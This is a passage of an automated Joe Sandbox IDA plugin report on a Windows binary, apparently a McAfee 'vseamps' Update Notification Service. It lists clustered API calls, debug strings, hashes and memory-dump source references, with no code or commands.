                                                      • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                      • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                      • API String ID: 1322048431-2685357988
                                                      • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                      • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                      • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                      • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                      • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                      • API String ID: 2984211723-3002863673
                                                      • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                      • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                      • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                      • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                      • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                      • API String ID: 678758403-4129911376
                                                      • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                      • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                      • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                      • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcesslstrlen
                                                      • String ID:
                                                      • API String ID: 3424473247-0
                                                      • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                      • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                      • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                      • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                      • String ID: bad exception$csm$csm$csm
                                                      • API String ID: 3766904988-820278400
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                      • String ID:
                                                      • API String ID: 2707001247-0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                       • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 849930591-393685449
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                       • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeLibraryProc
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 3013587201-537541572
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                      • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                      • API String ID: 1119674940-1966266597
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                      • API String ID: 3702919091-996641649
                                                      APIs
                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$Info
                                                      • String ID:
                                                      • API String ID: 1775632426-0
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF8FF5D72EB,?,?,?,00007FF8FF5D3EC0,?,?,?,?,00007FF8FF5D3CFD), ref: 00007FF8FF5D71B1
                                                      • GetLastError.KERNEL32(?,?,?,00007FF8FF5D72EB,?,?,?,00007FF8FF5D3EC0,?,?,?,?,00007FF8FF5D3CFD), ref: 00007FF8FF5D71BF
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF8FF5D72EB,?,?,?,00007FF8FF5D3EC0,?,?,?,?,00007FF8FF5D3CFD), ref: 00007FF8FF5D71E9
                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF8FF5D72EB,?,?,?,00007FF8FF5D3EC0,?,?,?,?,00007FF8FF5D3CFD), ref: 00007FF8FF5D7257
                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF8FF5D72EB,?,?,?,00007FF8FF5D3EC0,?,?,?,?,00007FF8FF5D3CFD), ref: 00007FF8FF5D7263
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                       • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                      • String ID: api-ms-
                                                      • API String ID: 2559590344-2084034818
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                       • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Value$ErrorLast
                                                      • String ID:
                                                      • API String ID: 2506987500-0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                       • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                      • String ID: CONOUT$
                                                      • API String ID: 3230265001-3130406586
                                                      APIs
                                                      • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                      • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                        • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                        • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                        • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                        • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                        • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                        • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                        • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                        • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                        • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                        • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                        • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                      • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                      • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                        • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                        • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                        • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                        • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                        • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                        • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                      • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                      • String ID: vseamps
                                                      • API String ID: 3197017603-3944098904
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Messagesprintf_s
                                                      • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                      • API String ID: 2642950106-3610746849
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      APIs
                                                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                      • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 319667368-0
                                                      APIs
                                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                      • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                        • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                      • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                      • String ID:
                                                      • API String ID: 1390108997-0
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 3523768491-393685449
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,00007FF8FF5D8BC9,?,?,?,?,00007FF8FF5D8C14), ref: 00007FF8FF5D95CB
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D8BC9,?,?,?,?,00007FF8FF5D8C14), ref: 00007FF8FF5D9601
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D8BC9,?,?,?,?,00007FF8FF5D8C14), ref: 00007FF8FF5D962E
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D8BC9,?,?,?,?,00007FF8FF5D8C14), ref: 00007FF8FF5D963F
